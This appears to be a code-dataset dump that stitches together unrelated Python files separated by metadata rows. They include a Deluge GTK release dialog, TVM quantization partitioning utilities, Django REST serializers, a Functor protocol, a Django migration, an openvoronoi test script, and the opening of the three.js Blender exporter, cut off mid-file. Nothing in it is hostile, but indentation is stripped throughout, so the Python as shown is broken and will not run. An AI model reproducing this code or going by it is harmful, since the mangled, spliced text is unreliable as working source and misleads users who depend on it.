# library.
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
#
#
import deluge.component as component
import deluge.common
from deluge.configmanager import ConfigManager
from deluge.ui.client import client
class NewReleaseDialog:
def __init__(self):
pass
def show(self, available_version):
self.config = ConfigManager("gtkui.conf")
glade = component.get("MainWindow").main_glade
self.dialog = glade.get_widget("new_release_dialog")
# Set the version labels
if deluge.common.windows_check() or deluge.common.osx_check():
glade.get_widget("image_new_release").set_from_file(
deluge.common.get_pixmap("deluge16.png"))
else:
glade.get_widget("image_new_release").set_from_icon_name("deluge", 4)
glade.get_widget("label_available_version").set_text(available_version)
glade.get_widget("label_client_version").set_text(
deluge.common.get_version())
self.chk_not_show_dialog = glade.get_widget("chk_do_not_show_new_release")
glade.get_widget("button_goto_downloads").connect(
"clicked", self._on_button_goto_downloads)
glade.get_widget("button_close_new_release").connect(
"clicked", self._on_button_close_new_release)
if client.connected():
def on_info(version):
glade.get_widget("label_server_version").set_text(version)
glade.get_widget("label_server_version").show()
glade.get_widget("label_server_version_text").show()
if not client.is_classicmode():
glade.get_widget("label_client_version_text").set_label(_("<i>Client Version</i>"))
client.daemon.info().addCallback(on_info)
self.dialog.show()
def _on_button_goto_downloads(self, widget):
deluge.common.open_url_in_browser("http://deluge-torrent.org")
self.config["show_new_releases"] = not self.chk_not_show_dialog.get_active()
self.dialog.destroy()
def _on_button_close_new_release(self, widget):
self.config["show_new_releases"] = not self.chk_not_show_dialog.get_active()
self.dialog.destroy()
| gpl-3.0 | -7,677,925,521,064,300,000 | 40.952941 | 99 | 0.675547 | false |
tqchen/tvm | python/tvm/relay/quantize/_partition_conversions.py | 1 | 13074 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-argument, not-context-manager
"""Utilities for partitioning input quantization and output dequantization expressions."""
import tvm
from tvm import relay
from tvm.relay.expr_functor import ExprMutator, ExprVisitor
# operators that are allowed in prefix/suffix partitions, because they are used
# to quantize/dequantize
ALLOWED_CONVERSION_OPS = ["add", "multiply", "right_shift", "clip", "round", "cast"]
def partition_conversions(mod, quantized_dtypes, ensure_fully_integral):
"""Partition mod into input quantization, core quantized inference, and output dequantization.
The resulting module includes an additional `main` that fuses all three
partitions together.
Parameters
----------
mod : tvm.IRModule
Quantized module to partition
quantized_dtypes : Set[str]
Set of data types allowed in quantized operators
ensure_fully_integral : bool
Whether to raise an exception if there are unquantized operators in the result
Returns
-------
fused_mod : tvm.IRModule
Module containing the input quantization (`quantize_inputs`), core
quantized inference (`quantized_main`), output dequantization
(`dequantize_outputs`), and full quantized inference functions
"""
# Partitioning is implemented as in the diagram below:
#
# +----------------------------+
# |Quantized Inference Function|
# +--------------+-------------+
# |
# partition_prefix
# |
# +-----+-------------------------+
# | |
# +--------v---------+ +-----------------v------------------+
# |Input Quantization| |Rest of Quantized Inference Function|
# +------------------+ +-----------------+------------------+
# |
# partition_suffix
# |
# +------+---------------------+
# | |
# +------------------+ +----------v------------+ +-----------v---------+
# |Input Quantization| |Core Quantized Function| |Output Dequantization|
# +------------------+ +-----------------------+ +---------------------+
#
# The final module contains all three partitions, as well as a
# `main` function that composes these three functions (depicted below).
#
# +--------------------+-------------------------+-----------------------+
# | Input Quantization | Core Quantized Function | Output Dequantization |
# +--------------------+-------------------------+-----------------------+
assert len(mod.functions) == 1
pre_mod, mid_mod = partition_prefix(mod, quantized_dtypes)
mid_mod, post_mod = partition_suffix(mid_mod, quantized_dtypes)
if ensure_fully_integral:
assert has_only_conversion_ops(pre_mod["main"])
assert relay.analysis.all_dtypes(mid_mod["main"]).issubset(quantized_dtypes)
assert has_only_conversion_ops(post_mod["main"])
return fuse_partitions(pre_mod, mid_mod, post_mod)
def fuse_partitions(pre_mod, mid_mod, post_mod):
"""Combine prefix, middle, and suffix modules into a single module.
The combined module includes an additional `main` that fuses all three
partitions together.
Parameters
----------
pre_mod : tvm.IRModule
Module containing an input quantization function
mid_mod : tvm.IRModule
Module containing core of a quantized inference function
post_mod : tvm.IRModule
Module containing an output dequantization function
Returns
-------
fused_mod : tvm.IRModule
Module containing the input quantization, core quantized inference,
output dequantization, and full quantized inference functions
"""
pre_func = pre_mod["main"]
mid_func = mid_mod["main"]
post_func = post_mod["main"]
# create a module containing the prefix, middle, and suffix partitions
fused_mod = tvm.IRModule(
functions={
relay.GlobalVar("quantize_inputs"): pre_func,
relay.GlobalVar("quantized_main"): mid_func,
relay.GlobalVar("dequantize_outputs"): post_func,
}
)
# construct a `main` that strings together the partitions, such that its
# behaviour is equivalent to `main` in an *unpartitioned* module
scope_builder = relay.ScopeBuilder()
fused_mod_main_params = [relay.Var(param.name_hint) for param in pre_func.params]
quantized_inputs = scope_builder.let(
"quantized_inputs",
relay.Call(fused_mod.get_global_var("quantize_inputs"), fused_mod_main_params),
)
quantized_outputs = scope_builder.let(
"quantized_outputs",
relay.Call(
fused_mod.get_global_var("quantized_main"),
[relay.TupleGetItem(quantized_inputs, i) for i in range(len(pre_func.ret_type.fields))],
),
)
dequantized_outputs = scope_builder.let(
"dequantized_outputs",
relay.Call(fused_mod.get_global_var("dequantize_outputs"), [quantized_outputs]),
)
scope_builder.ret(dequantized_outputs)
fused_mod["main"] = relay.Function(fused_mod_main_params, scope_builder.get())
return fused_mod
class PrefixCutter(ExprMutator):
"""A mutator for extracting input quantization expressions from a function
The result of `visit` is the core function, and the input quantization
expressions are stored in the `prefix_sb` scope builder.
"""
def __init__(self, params, quantized_dtypes):
ExprMutator.__init__(self)
self.params = set(params)
self.quantized_dtypes = quantized_dtypes
self.subtree_params = set()
self.new_func_params = []
self.prefix_sb = relay.ScopeBuilder()
self.prefix_binding_map = {}
def visit_var(self, var):
if var in self.params:
self.subtree_params.add(var)
return var
def visit_call(self, call):
# TODO(weberlo) use graph pattern matching?
if not hasattr(call.op, "name") or call.op.name not in ALLOWED_CONVERSION_OPS:
new_args = []
for arg in call.args:
new_arg = self.visit(arg)
if len(self.subtree_params) == 0:
new_args.append(new_arg)
else:
assert len(self.subtree_params) == 1
param = next(iter(self.subtree_params))
pre_param = self.prefix_sb.let(param.name_hint, new_arg)
self.subtree_params.clear()
mid_param = relay.Var(param.name_hint, arg.checked_type)
self.prefix_binding_map[mid_param] = pre_param
# return new parameter, then we can use
# relay.analysis.free_vars at the end of the pass to generate
# new `mid_func` type signature
new_args.append(mid_param)
return relay.Call(call.op, new_args, call.attrs)
return super().visit_call(call)
def partition_prefix(mod, quantized_dtypes):
"""Extract input quantization expressions from `mod['main']`.
Parameters
----------
mod : tvm.IRModule
Module containing a quantized inference function
quantized_dtypes : Set[str]
Set of data types allowed in quantized operators
Returns
-------
pre_mod : tvm.IRModule
Module containing the input quantization function
mid_mod : tvm.IRModule
Module containing a function with everything except for input quantization
"""
assert len(mod.functions) == 1
func = mod["main"]
prefix_cutter = PrefixCutter(func.params, quantized_dtypes)
mid_body = prefix_cutter.visit(func.body)
assert not func.type_params, "unimplemented"
assert func.attrs is None, "unimplemented"
mid_func = relay.Function(relay.analysis.free_vars(mid_body), mid_body)
mid_mod = tvm.IRModule.from_expr(mid_func)
scope_builder = prefix_cutter.prefix_sb
# make sure we pass through all inputs in the prefix function's return expr
# (even those that don't require quantization)
ret_expr = []
for param in mid_func.params:
if param in prefix_cutter.prefix_binding_map:
# this param required a conversion, so we collected it in the
# prefix cutter pass, and we can use the pass's mapping from mid
# func params to pre func params
ret_expr.append(prefix_cutter.prefix_binding_map[param])
else:
# there was no detected conversion for this argument, so we thread
# it through the prefix function untouched
ret_expr.append(relay.Var(param.name_hint, param.checked_type))
ret_expr = relay.Tuple(ret_expr)
scope_builder.ret(ret_expr)
pre_func_body = scope_builder.get()
pre_func = relay.Function(relay.analysis.free_vars(pre_func_body), pre_func_body)
pre_mod = tvm.IRModule.from_expr(pre_func)
return pre_mod, mid_mod
class SuffixCutter(ExprMutator):
"""A mutator for extracting output dequantization expressions from a function
The result of `visit` is a function containing the output dequantization
expressions, and the middle of the function is stored in `mid_body`.
"""
def __init__(self, quantized_dtypes):
ExprMutator.__init__(self)
self.mid_body = None
self.quantized_dtypes = quantized_dtypes
def visit(self, expr):
if hasattr(expr, "checked_type") and expr.checked_type.dtype in self.quantized_dtypes:
self.mid_body = expr
return relay.Var("input", expr.checked_type)
return super().visit(expr)
def partition_suffix(mod, quantized_dtypes):
"""Extract output dequantization expressions from `mod['main']`.
Parameters
----------
mod : tvm.IRModule
Module containing a quantized inference function
quantized_dtypes : Set[str]
Set of data types allowed in quantized operators
Returns
-------
pre_mod : tvm.IRModule
Module containing the input quantization function
mid_mod : tvm.IRModule
Module containing a function with everything except for input quantization
"""
assert len(mod.functions) == 1
func = mod["main"]
suffix_cutter = SuffixCutter(quantized_dtypes)
post_body = suffix_cutter.visit(func.body)
assert not func.type_params, "unimplemented"
assert func.attrs is None, "unimplemented"
post_func = relay.Function(relay.analysis.free_vars(post_body), post_body, func.ret_type)
post_mod = tvm.IRModule.from_expr(post_func)
mid_body = suffix_cutter.mid_body
if mid_body is None:
# The suffix contains the entire function, meaning there was no
# quantization boundary in the given mod. In this case, we use the
# suffix mod as the middle mod and make the suffix an identity function.
mid_mod = post_mod
post_body = relay.Var("input", mid_mod["main"].ret_type)
post_func = relay.Function([post_body], post_body)
post_mod = tvm.IRModule.from_expr(post_func)
else:
mid_func = relay.Function(func.params, mid_body)
mid_mod = tvm.IRModule.from_expr(mid_func)
return mid_mod, post_mod
class ConversionOpChecker(ExprVisitor):
"""A pass for checking that the visited function contains only conversion ops"""
def __init__(self):
ExprVisitor.__init__(self)
self.valid = True
def visit_call(self, call):
if not hasattr(call.op, "name") or call.op.name not in ALLOWED_CONVERSION_OPS:
self.valid = False
super().visit_call(call)
def has_only_conversion_ops(func):
"""Return true iff the given function contains only quantization/dequantization ops.
Parameters
----------
func : relay.Function
Function being checked
Returns
-------
valid : bool
Whether the function contains only conversion ops
"""
checker = ConversionOpChecker()
checker.visit(func)
return checker.valid
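# ---------------------------------------------------------------------------
# Usage sketch, not part of the original module. `quantized_mod` is assumed to
# be a module produced by relay quantization with int8/int32 as the quantized
# dtypes; the call below splits it into the three partitions documented above:
#
#   fused = partition_conversions(
#       quantized_mod,
#       quantized_dtypes={"int8", "int32"},
#       ensure_fully_integral=True)
#   # fused now exposes `quantize_inputs`, `quantized_main`,
#   # `dequantize_outputs`, and a composed `main`.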
| apache-2.0 | -4,459,951,679,981,442,000 | 37.910714 | 100 | 0.614043 | false |
pyoseo/django-oseoserver | oseoserver/serializers.py | 1 | 2314 | import dateutil.parser
import pytz
from rest_framework import serializers
from rest_framework.exceptions import ValidationError
from . import models
from . import settings
class SubscriptionOrderSerializer(serializers.ModelSerializer):
class Meta:
model = models.Order
fields = (
"id",
"status",
"additional_status_info",
"completed_on",
"status_changed_on",
"remark",
)
read_only_fields =(
"id",
"status",
"additional_status_info",
"completed_on",
"status_changed_on",
)
def create(self, validated_data):
return models.Order.objects.create(
order_type=models.Order.SUBSCRIPTION_ORDER,
**validated_data
)
class SubscriptionProcessTimeslotSerializer(serializers.BaseSerializer):
def to_internal_value(self, data):
try:
timeslot = dateutil.parser.parse(data.get("timeslot"))
timeslot = timeslot.replace(
tzinfo=pytz.utc) if timeslot.tzinfo is None else timeslot
except ValueError:
raise ValidationError({"timeslot": "Invalid timeslot format"})
except TypeError:
raise ValidationError({"timeslot": "This field is required"})
collection = data.get("collection")
if collection is None:
raise ValidationError({"collection": "This field is required"})
elif collection not in (c["name"] for c in settings.get_collections()):
raise ValidationError({"collection": "Invalid collection"})
force_creation = data.get("force_creation", False)
return {
"timeslot": timeslot,
"collection": collection,
"force_creation": force_creation,
}
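# Illustrative payload for the serializer above (collection name is hypothetical):
#   {"timeslot": "2021-01-01T06:00:00", "collection": "SENTINEL2", "force_creation": True}
# Naive timestamps are coerced to UTC, a missing or unknown collection raises a
# ValidationError, and force_creation defaults to False when omitted.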
class SubscriptionBatchSerializer(serializers.ModelSerializer):
class Meta:
model = models.Batch
fields = (
"id",
"order",
"completed_on",
"updated_on",
"status",
"additional_status_info",
)
read_only_fields = (
"id",
"completed_on",
"updated_on",
"status",
"additional_status_info",
)
| apache-2.0 | -7,736,547,799,650,802,000 | 28.291139 | 79 | 0.564823 | false |
dbrattli/OSlash | oslash/typing/functor.py | 1 | 1141 | from abc import abstractmethod
from typing import TypeVar, Protocol, Callable
from typing_extensions import runtime_checkable
TSource = TypeVar('TSource', covariant=True)
TResult = TypeVar('TResult')
@runtime_checkable
class Functor(Protocol[TSource]):
"""The Functor class is used for types that can be mapped over.
Instances of Functor should satisfy the following laws:
Haskell:
fmap id == id
fmap (f . g) == fmap f . fmap g
Python:
x.map(id) == id(x)
x.map(compose(f, g)) == x.map(g).map(f)
The instances of Functor for lists, Maybe and IO satisfy these laws.
"""
@abstractmethod
def map(self, fn: Callable[[TSource], TResult]) -> 'Functor[TResult]':
"""Map a function over wrapped values.
Map knows how to apply functions to values that are wrapped in
a context.
"""
raise NotImplementedError
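    # Law sketch for a concrete instance (e.g. a Maybe- or List-style functor built
    # on this protocol):
    #   identity:    xs.map(lambda a: a) == xs
    #   composition: xs.map(lambda a: f(g(a))) == xs.map(g).map(f)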
# def __rmod__(self, fn):
# """Infix version of map.
# Haskell: <$>
# Example:
# >>> (lambda x: x+2) % Just(40)
# 42
# Returns a new Functor.
# """
# return self.map(fn)
| apache-2.0 | 3,561,620,570,025,413,600 | 23.804348 | 74 | 0.606486 | false |
Tima-Is-My-Association/TIMA | association/migrations/0002_word.py | 1 | 1066 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import association.models
class Migration(migrations.Migration):
dependencies = [
('association', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Word',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('name', association.models.TextFieldSingleLine()),
('count', models.BigIntegerField(default=0)),
('language', models.ForeignKey(related_name='words', to='association.Language')),
],
options={
'ordering': ('name',),
},
),
migrations.AlterUniqueTogether(
name='word',
unique_together=set([('name', 'language')]),
),
]
| lgpl-3.0 | 4,240,898,878,019,281,400 | 31.30303 | 114 | 0.547842 | false |
aewallin/openvoronoi | python_examples/issues/polygon_2015-02-19.py | 1 | 4928 | import openvoronoi as ovd
import ovdvtk
import time
import vtk
import datetime
import math
import random
import os
import sys
import pickle
import gzip
import ovdgenerators as gens
def drawLine(myscreen, pt1, pt2, lineColor):
myscreen.addActor(ovdvtk.Line(p1=(pt1.x, pt1.y, 0), p2=(pt2.x, pt2.y, 0), color=lineColor))
def drawArc(myscreen, pt1, pt2, r, arcColor):
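    # NOTE: the "arc" is currently rendered as a straight chord from pt1 to pt2; the radius r is unused.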
myscreen.addActor(ovdvtk.Line(p1=(pt1.x, pt1.y, 0), p2=(pt2.x, pt2.y, 0), color=arcColor))
def drawOffsets(myscreen, ofs):
# draw loops
nloop = 0
lineColor = ovdvtk.green
arcColor = ovdvtk.grass
for lop in ofs:
n = 0
N = len(lop)
first_point = []
previous = []
for p in lop:
# p[0] is the Point
# p[1] is -1 for lines, and r for arcs
if n == 0: # don't draw anything on the first iteration
previous = p[0]
# first_point = p[0]
else:
r = p[1]
p = p[0]
if r == -1:
drawLine(myscreen, previous, p, lineColor)
else:
drawArc(myscreen, previous, p, r, arcColor)
# myscreen.addActor( ovdvtk.Line(p1=(previous.x,previous.y,0),p2=(p.x,p.y,0),color=loopColor) )
previous = p
n = n + 1
print "rendered loop ", nloop, " with ", len(lop), " points"
nloop = nloop + 1
poly_points = [(0.15907424869091413, -0.22755592000227737),
(-0.158774429631718, -0.22755592000227737),
(-0.158774429631718, 0.5000000000000007),
(0.44085019690616595, -0.4999999999999993),
(0.44085019690616595, 0.4999999999999993)]
if __name__ == "__main__":
# w=2500
# h=1500
# w=1920
# h=1080
w = 1024
h = 1024
myscreen = ovdvtk.VTKScreen(width=w, height=h)
ovdvtk.drawOCLtext(myscreen, rev_text=ovd.version())
scale = 1
myscreen.render()
random.seed(42)
far = 1
camPos = far
zmult = 3
# camPos/float(1000)
myscreen.camera.SetPosition(0, -camPos / float(1000), zmult * camPos)
myscreen.camera.SetClippingRange(-(zmult + 1) * camPos, (zmult + 1) * camPos)
myscreen.camera.SetFocalPoint(0.0, 0, 0)
vd = ovd.VoronoiDiagram(far, 120)
print ovd.version()
# for vtk visualization
vod = ovdvtk.VD(myscreen, vd, float(scale), textscale=0.01, vertexradius=0.003)
vod.drawFarCircle()
vod.textScale = 0.02
vod.vertexRadius = 0.0031
vod.drawVertices = 0
vod.drawVertexIndex = 1
vod.drawGenerators = 1
vod.offsetEdges = 0
vd.setEdgeOffset(0.05)
"""
p1=ovd.Point(-0.1,-0.2)
p2=ovd.Point(0.2,0.1)
p3=ovd.Point(0.4,0.2)
p4=ovd.Point(0.6,0.6)
p5=ovd.Point(-0.6,0.3)
pts = [p1,p2,p3,p4,p5]
"""
pts = []
for p in poly_points:
pts.append(ovd.Point(p[0], p[1]))
# t_after = time.time()
# print ".done in {0:.3f} s.".format( t_after-t_before )
times = []
id_list = []
m = 0
t_before = time.time()
for p in pts:
pt_id = vd.addVertexSite(p)
id_list.append(pt_id)
print m, " added vertex", pt_id, " at ", p
m = m + 1
t_after = time.time()
times.append(t_after - t_before)
# exit()
# print " ",2*Nmax," point-sites sites took {0:.3f}".format(times[0])," seconds, {0:.2f}".format( 1e6*float( times[0] )/(float(2*Nmax)*float(math.log10(2*Nmax))) ) ,"us/n*log(n)"
print "all point sites inserted. "
print "VD check: ", vd.check()
print "now adding line-segments."
t_before = time.time()
for n in [0]: # range(len(id_list)):
if n == len(id_list) - 1:
print n, " trying ", n, " to ", n + 1
vd.addLineSite(id_list[n], id_list[n + 1])
print n, " added segment", n, " to ", n + 1
else:
print n, " trying ", n, " to ", n + 1
vd.addLineSite(id_list[n], id_list[0])
print n, " added final segment", n, " to ", 0
# vd.addLineSite( id_list[1], id_list[2])
# vd.addLineSite( id_list[2], id_list[3])
# vd.addLineSite( id_list[3], id_list[4])
# vd.addLineSite( id_list[4], id_list[0])
vd.check()
t_after = time.time()
line_time = t_after - t_before
if line_time < 1e-3:
line_time = 1
times.append(line_time)
# of = ovd.Offset( vd.getGraph() ) # pass the created graph to the Offset class
# of.str()
# ofs = of.offset(0.123)
# print ofs
# drawOffsets(myscreen, ofs)
pi = ovd.PolygonInterior(True)
vd.filter_graph(pi)
of = ovd.Offset(vd.getGraph()) # pass the created graph to the Offset class
ofs = of.offset(0.123)
# print ofs
ovdvtk.drawOffsets(myscreen, ofs)
# of.offset(0.125)
vod.setVDText2(times)
vod.setAll()
print "PYTHON All DONE."
myscreen.render()
myscreen.iren.Start()
| lgpl-2.1 | 3,184,200,570,010,201,600 | 27.321839 | 184 | 0.559253 | false |
altGrey/TrueOpenIso | SOURCE/CODE/cssh/public_html/js/three/mrdoob-three.js-d3cb4e7/utils/exporters/blender/2.65/scripts/addons/io_mesh_threejs/export_threejs.py | 9 | 85025 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
"""
Blender exporter for Three.js (ASCII JSON format).
TODO
- binary format
"""
import bpy
import mathutils
import shutil
import os
import os.path
import math
import operator
import random
# #####################################################
# Configuration
# #####################################################
DEFAULTS = {
"bgcolor" : [0, 0, 0],
"bgalpha" : 1.0,
"position" : [0, 0, 0],
"rotation" : [0, 0, 0],
"scale" : [1, 1, 1],
"camera" :
{
"name" : "default_camera",
"type" : "PerspectiveCamera",
"near" : 1,
"far" : 10000,
"fov" : 60,
"aspect": 1.333,
"position" : [0, 0, 10],
"target" : [0, 0, 0]
},
"light" :
{
"name" : "default_light",
"type" : "DirectionalLight",
"direction" : [0, 1, 1],
"color" : [1, 1, 1],
"intensity" : 0.8
}
}
ROTATE_X_PI2 = mathutils.Quaternion((1.0, 0.0, 0.0), math.radians(-90.0)).to_matrix().to_4x4()
# default colors for debugging (each material gets one distinct color):
# white, red, green, blue, yellow, cyan, magenta
COLORS = [0xeeeeee, 0xee0000, 0x00ee00, 0x0000ee, 0xeeee00, 0x00eeee, 0xee00ee]
# skinning
MAX_INFLUENCES = 2
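# number of bone influences exported per vertex: only the MAX_INFLUENCES strongest
# weights are kept, the rest are dropped (see generate_indices_and_weights below)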
# #####################################################
# Templates - scene
# #####################################################
TEMPLATE_SCENE_ASCII = """\
{
"metadata" :
{
"formatVersion" : 3.2,
"type" : "scene",
"sourceFile" : "%(fname)s",
"generatedBy" : "Blender 2.7 Exporter",
"objects" : %(nobjects)s,
"geometries" : %(ngeometries)s,
"materials" : %(nmaterials)s,
"textures" : %(ntextures)s
},
"urlBaseType" : %(basetype)s,
%(sections)s
"transform" :
{
"position" : %(position)s,
"rotation" : %(rotation)s,
"scale" : %(scale)s
},
"defaults" :
{
"bgcolor" : %(bgcolor)s,
"bgalpha" : %(bgalpha)f,
"camera" : %(defcamera)s
}
}
"""
TEMPLATE_SECTION = """
"%s" :
{
%s
},
"""
TEMPLATE_OBJECT = """\
%(object_id)s : {
"geometry" : %(geometry_id)s,
"groups" : [ %(group_id)s ],
"material" : %(material_id)s,
"position" : %(position)s,
"rotation" : %(rotation)s,
"quaternion": %(quaternion)s,
"scale" : %(scale)s,
"visible" : %(visible)s,
"castShadow" : %(castShadow)s,
"receiveShadow" : %(receiveShadow)s,
"doubleSided" : %(doubleSided)s
}"""
TEMPLATE_EMPTY = """\
%(object_id)s : {
"groups" : [ %(group_id)s ],
"position" : %(position)s,
"rotation" : %(rotation)s,
"quaternion": %(quaternion)s,
"scale" : %(scale)s
}"""
TEMPLATE_GEOMETRY_LINK = """\
%(geometry_id)s : {
"type" : "ascii",
"url" : %(model_file)s
}"""
TEMPLATE_GEOMETRY_EMBED = """\
%(geometry_id)s : {
"type" : "embedded",
"id" : %(embed_id)s
}"""
TEMPLATE_TEXTURE = """\
%(texture_id)s : {
"url": %(texture_file)s%(extras)s
}"""
TEMPLATE_MATERIAL_SCENE = """\
%(material_id)s : {
"type": %(type)s,
"parameters": { %(parameters)s }
}"""
TEMPLATE_CAMERA_PERSPECTIVE = """\
%(camera_id)s : {
"type" : "PerspectiveCamera",
"fov" : %(fov)f,
"aspect": %(aspect)f,
"near" : %(near)f,
"far" : %(far)f,
"position": %(position)s,
"target" : %(target)s
}"""
TEMPLATE_CAMERA_ORTHO = """\
%(camera_id)s : {
"type" : "OrthographicCamera",
"left" : %(left)f,
"right" : %(right)f,
"top" : %(top)f,
"bottom": %(bottom)f,
"near" : %(near)f,
"far" : %(far)f,
"position": %(position)s,
"target" : %(target)s
}"""
TEMPLATE_LIGHT_POINT = """\
%(light_id)s : {
"type" : "PointLight",
"position" : %(position)s,
"rotation" : %(rotation)s,
"color" : %(color)d,
"distance" : %(distance).3f,
"intensity" : %(intensity).3f
}"""
TEMPLATE_LIGHT_SUN = """\
%(light_id)s : {
"type" : "AmbientLight",
"position" : %(position)s,
"rotation" : %(rotation)s,
"color" : %(color)d,
"distance" : %(distance).3f,
"intensity" : %(intensity).3f
}"""
TEMPLATE_LIGHT_SPOT = """\
%(light_id)s : {
"type" : "SpotLight",
"position" : %(position)s,
"rotation" : %(rotation)s,
"color" : %(color)d,
"distance" : %(distance).3f,
"intensity" : %(intensity).3f,
"use_shadow" : %(use_shadow)d,
"angle" : %(angle).3f
}"""
TEMPLATE_LIGHT_HEMI = """\
%(light_id)s : {
"type" : "HemisphereLight",
"position" : %(position)s,
"rotation" : %(rotation)s,
"color" : %(color)d,
"distance" : %(distance).3f,
"intensity" : %(intensity).3f
}"""
TEMPLATE_LIGHT_AREA = """\
%(light_id)s : {
"type" : "AreaLight",
"position" : %(position)s,
"rotation" : %(rotation)s,
"color" : %(color)d,
"distance" : %(distance).3f,
"intensity" : %(intensity).3f,
"gamma" : %(gamma).3f,
"shape" : "%(shape)s",
"size" : %(size).3f,
"size_y" : %(size_y).3f
}"""
TEMPLATE_VEC4 = '[ %g, %g, %g, %g ]'
TEMPLATE_VEC3 = '[ %g, %g, %g ]'
TEMPLATE_VEC2 = '[ %g, %g ]'
TEMPLATE_STRING = '"%s"'
TEMPLATE_HEX = "0x%06x"
# #####################################################
# Templates - model
# #####################################################
TEMPLATE_FILE_ASCII = """\
{
"metadata" :
{
"formatVersion" : 3.1,
"generatedBy" : "Blender 2.7 Exporter",
"vertices" : %(nvertex)d,
"faces" : %(nface)d,
"normals" : %(nnormal)d,
"colors" : %(ncolor)d,
"uvs" : [%(nuvs)s],
"materials" : %(nmaterial)d,
"morphTargets" : %(nmorphTarget)d,
"bones" : %(nbone)d
},
%(model)s
}
"""
TEMPLATE_MODEL_ASCII = """\
"scale" : %(scale)f,
"materials" : [%(materials)s],
"vertices" : [%(vertices)s],
"morphTargets" : [%(morphTargets)s],
"normals" : [%(normals)s],
"colors" : [%(colors)s],
"uvs" : [%(uvs)s],
"faces" : [%(faces)s],
"bones" : [%(bones)s],
"skinIndices" : [%(indices)s],
"skinWeights" : [%(weights)s],
"animations" : [%(animations)s]
"""
TEMPLATE_VERTEX = "%g,%g,%g"
TEMPLATE_VERTEX_TRUNCATE = "%d,%d,%d"
TEMPLATE_N = "%g,%g,%g"
TEMPLATE_UV = "%g,%g"
TEMPLATE_C = "%d"
# #####################################################
# Utils
# #####################################################
def veckey3(x,y,z):
return round(x, 6), round(y, 6), round(z, 6)
def veckey3d(v):
return veckey3(v.x, v.y, v.z)
def veckey2d(v):
return round(v[0], 6), round(v[1], 6)
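# veckey3/veckey2d round coordinates to 6 decimals so nearly identical normals and
# UVs collapse onto the same dictionary key and therefore share one exported index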
def get_faces(obj):
if hasattr(obj, "tessfaces"):
return obj.tessfaces
else:
return obj.faces
def get_normal_indices(v, normals, mesh):
n = []
mv = mesh.vertices
for i in v:
normal = mv[i].normal
key = veckey3d(normal)
n.append( normals[key] )
return n
def get_uv_indices(face_index, uvs, mesh, layer_index):
uv = []
uv_layer = mesh.tessface_uv_textures[layer_index].data
for i in uv_layer[face_index].uv:
uv.append( uvs[veckey2d(i)] )
return uv
def get_color_indices(face_index, colors, mesh):
c = []
color_layer = mesh.tessface_vertex_colors.active.data
face_colors = color_layer[face_index]
face_colors = face_colors.color1, face_colors.color2, face_colors.color3, face_colors.color4
for i in face_colors:
c.append( colors[hexcolor(i)] )
return c
def rgb2int(rgb):
color = (int(rgb[0]*255) << 16) + (int(rgb[1]*255) << 8) + int(rgb[2]*255);
return color
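# e.g. rgb2int([1.0, 0.5, 0.0]) == 0xff7f00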
# #####################################################
# Utils - files
# #####################################################
def write_file(fname, content):
out = open(fname, "w", encoding="utf-8")
out.write(content)
out.close()
def ensure_folder_exist(foldername):
"""Create folder (with whole path) if it doesn't exist yet."""
if not os.access(foldername, os.R_OK|os.W_OK|os.X_OK):
os.makedirs(foldername)
def ensure_extension(filepath, extension):
if not filepath.lower().endswith(extension):
filepath += extension
return filepath
def generate_mesh_filename(meshname, filepath):
normpath = os.path.normpath(filepath)
path, ext = os.path.splitext(normpath)
return "%s.%s%s" % (path, meshname, ext)
# #####################################################
# Utils - alignment
# #####################################################
def bbox(vertices):
"""Compute bounding box of vertex array.
"""
if len(vertices)>0:
minx = maxx = vertices[0].co.x
miny = maxy = vertices[0].co.y
minz = maxz = vertices[0].co.z
for v in vertices[1:]:
if v.co.x < minx:
minx = v.co.x
elif v.co.x > maxx:
maxx = v.co.x
if v.co.y < miny:
miny = v.co.y
elif v.co.y > maxy:
maxy = v.co.y
if v.co.z < minz:
minz = v.co.z
elif v.co.z > maxz:
maxz = v.co.z
return { 'x':[minx,maxx], 'y':[miny,maxy], 'z':[minz,maxz] }
else:
return { 'x':[0,0], 'y':[0,0], 'z':[0,0] }
def translate(vertices, t):
"""Translate array of vertices by vector t.
"""
for i in range(len(vertices)):
vertices[i].co.x += t[0]
vertices[i].co.y += t[1]
vertices[i].co.z += t[2]
def center(vertices):
"""Center model (middle of bounding box).
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = bb['y'][0] + (bb['y'][1] - bb['y'][0])/2.0
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
return [-cx,-cy,-cz]
def top(vertices):
"""Align top of the model with the floor (Y-axis) and center it around X and Z.
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = bb['y'][1]
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
